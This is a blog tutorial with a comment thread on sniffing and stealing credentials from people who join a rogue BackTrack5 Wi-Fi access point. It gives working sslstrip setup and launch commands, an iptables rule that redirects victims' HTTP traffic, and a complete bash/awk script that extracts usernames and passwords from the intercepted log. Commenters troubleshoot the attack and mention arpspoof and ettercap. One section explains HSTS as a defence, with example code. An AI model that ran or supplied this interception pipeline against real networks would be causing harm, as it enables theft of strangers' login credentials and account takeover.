Sniff traffic on your BackTrack5 Access Point

This is a continuation of the previous guide, Access Point in BackTrack5, which you can find here:
http://teh-geek.com/?p=512

Once the access point is set up and working, we want to be able to sniff the traffic going through it.
In fact, the only things we need are a tool called sslstrip, written in Python, and
part of a custom script I found in comaX’s “sniffing traffic” post.
A link to comaX’s script can be found at the end of this article.

First off, install sslstrip if you haven’t already.
It’s quite simple:

cd /pentest/web/sslstrip/
python setup.py install

Then we need to run sslstrip with logging enabled, since we are going to search the log file
for usernames and passwords.

The iptables rule needed for sslstrip (it redirects incoming port-80 traffic to sslstrip’s default listening port, 10000):

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

I start sslstrip with the following options:

sslstrip -a -f -k -w /root/sslstrip.log

The sslstrip.log quickly becomes HUGE and it’s almost impossible to look through it manually.

So the script I talked about earlier is used to look through sslstrip.log:

#!/bin/bash
# Parses /root/sslstrip.log for form fields that look like logins/passwords
# and writes the result to /root/filename.pass.txt.
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then
        # Keep only lines that look like POSTed form bodies (at least two
        # "&"-separated fields; no GET/if/header/HTML/numeric-prefixed lines)...
        awk -F "&" '!/GET/ && !/if/ && !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' /root/sslstrip.log |
        # ...split them into one key=value pair per line...
        awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
        # ...keep the pairs whose key looks like a login or password field...
        egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user=|username=|login=|credential=|_user|_pwd=|email_address=" |
        # ...and label each one; values shorter than 3 characters are dropped.
        awk -F "=" '{if (length($2) < 3) next; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' > /root/filename.pass.txt
        if [ -f "/root/filename.pass.txt" ]; then
                echo "Passwords saved !"
        else
                echo "Error while saving passwords"
        fi
else
        echo "Password saving skipped."
fi
# Temporary file created by the full script this snippet is taken from;
# -f so the rm does not fail when it is absent.
rm -f /root/filename.txt
echo -e "\nTemporary files deleted."

You might want to change some paths in the script to match where your sslstrip.log is written.

But that’s pretty much it.

Copy the script, chmod +x it and run it.
Then you have all the usernames and passwords from sslstrip.log without all the extra “information”.

Link to sslstrip: http://www.thoughtcrime.org/software/sslstrip/
Link to comaX’s script: http://www.backtrack-linux.org/forums/backtrack-5-general-topics/40683-script-sniffing-traffic.html

12 Responses to “Sniff traffic on your BackTrack5 Access Point”


  • Nice. Now no need to mess with iptables rules.
    I’m having a problem though getting sslstrip to remove the SSL. I followed your other tutorial and I got the AP to work.

    Using “cd /pentest/web/sslstrip/
    python setup.py install” installs sslstrip 0.8 on my backtrack gnome 32bit. so I downloaded the sslstrip 0.9 using the directions on the sslstrip website.

    When I run “sslstrip -a -f -k -w /root/sslstrip.log” it starts sslstrip 0.9, but the log stays empty and also all the websites that the user of my AP visit still have HTTPS.

    Any ideas of what the problem could be?

    • Sorry, that is my fault..
      I forgot to include the iptables rule needed to run sslstrip properly.
      Actually, I thought that it was included in the other guide..

      Anywho – I’ve added the iptables rule in this guide..

      Thanks for making me aware of it..

      //M00kaw

  • That works. Thanks. Keep up the “GREAT” work.

  • Thanks works for me as well. Keep them coming!

  • Hi!

    Your tutorial looks nice, but just one thing: does it sniff only SSL website logs, or also plain-protocol websites like HTTP?

    Thx!

    • The way ssl-strip works is by keeping http traffic separate from https. In other words, it bridges from port 80 to port 443. This is only for http…
      Another tool, for all other protocols, is sslsniff, which fakes a certificate. You can look into it at http://thoughtcrime.org/software/sslsniff/

      I’m writing a paper on the theory behind ssl-strip and a video is also coming up some time.

      After that, I’ll dive into ssl-sniff and write tutorials for that too..

      //M00kaw
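The reply above explains why sslstrip works at all: the victim's browser speaks plain http to the access point, and the proxy bridges that to the server's port 443. The browser-side defence against this downgrade is HTTP Strict Transport Security (RFC 6797): once a host's Strict-Transport-Security header has been seen over HTTPS, the browser upgrades every later http:// request for that host itself, before it ever reaches the port-80 redirect. The following is an added example, not code from the original post or from sslstrip; it is a minimal HSTS policy store in Python with a pluggable clock so expiry can be tested, and all host names in it are constructed.

```python
# Added example (not from the original post or from sslstrip): a minimal
# client-side HSTS policy store. sslstrip only works while the browser is
# willing to send plaintext HTTP for a host; a remembered HSTS policy makes
# the browser upgrade http:// to https:// before the request leaves, so the
# port-80 redirect on the access point never sees a request to rewrite.
import time
from urllib.parse import urlsplit, urlunsplit


class HstsStore:
    """Remembers Strict-Transport-Security policies per host (RFC 6797)."""

    def __init__(self, clock=time.time):
        self.clock = clock          # injectable for testing expiry
        self.policies = {}          # host -> (expires_at, include_subdomains)

    def observe(self, host, header_value):
        """Record the STS header of a response that arrived over HTTPS."""
        max_age, include_sub = None, False
        for directive in header_value.split(";"):
            name, _, value = directive.strip().partition("=")
            name, value = name.strip().lower(), value.strip().strip('"')
            if name == "max-age" and value.isdigit():
                max_age = int(value)
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None:
            return                  # no valid max-age: header is ignored
        if max_age == 0:
            self.policies.pop(host.lower(), None)   # max-age=0 deletes the policy
        else:
            self.policies[host.lower()] = (self.clock() + max_age, include_sub)

    def is_known_host(self, host):
        """True if an unexpired policy covers host (directly or via includeSubDomains)."""
        host, now = host.lower(), self.clock()
        for known, (expires, include_sub) in self.policies.items():
            if expires <= now:
                continue
            if host == known or (include_sub and host.endswith("." + known)):
                return True
        return False

    def rewrite(self, url):
        """Upgrade http:// to https:// for known HSTS hosts; others pass through."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known_host(parts.hostname or ""):
            netloc = parts.netloc[:-3] if parts.netloc.endswith(":80") else parts.netloc
            return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))
        return url
```

A host the store has never seen over HTTPS (or one whose policy has expired) is still sent in plaintext, which is exactly the first-visit window that preload lists exist to close.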

  • Dear
    I work pretty well with sslstrip and I use the command:
    sslstrip -k -l 10000
    I receive all the information I need with arpspoof and ettercap, but how can I keep the logs with all the information permanently on the computer or on the USB BackTrack? Because when I shut down the computer I do not know where the logs are. Can you help?
    Best regards and thanks for your effort

  • Should this:
    sslstrip -a -f -k -w /root/sslstrip.log

    be like this:
    sslstrip -a -f -k -l 10000 -w /root/sslstrip.log

    Your tutorial seems to be the only place where -l is not in use and I’m just wondering why? Did you forget it, or will this really work without it?

    • -l is the listening port, and that’s port 10000 by default, so writing -l 10000 is just useless, since the program already does that.
      You only use -l if you don’t want to use port 10000.
      I hope that explains it?

  • Hey! Nice post… I was just wondering if you could tell me how to go about seeing the traffic log from sslstrip. I tried cat sslstrip.log but it doesn’t seem to pull up anything. Someone also asked me to check the folder of SSLSTRIP and find a new file sslstrip.log… Any idea on how to do that? I’m running bt5

    • When launching ssl-strip, make sure to launch it with -w /path/to/dir where you want to save the log-file.
      Then parse the log-file for username, password, email etc.
      I’ve used a snip of code – you can find it at
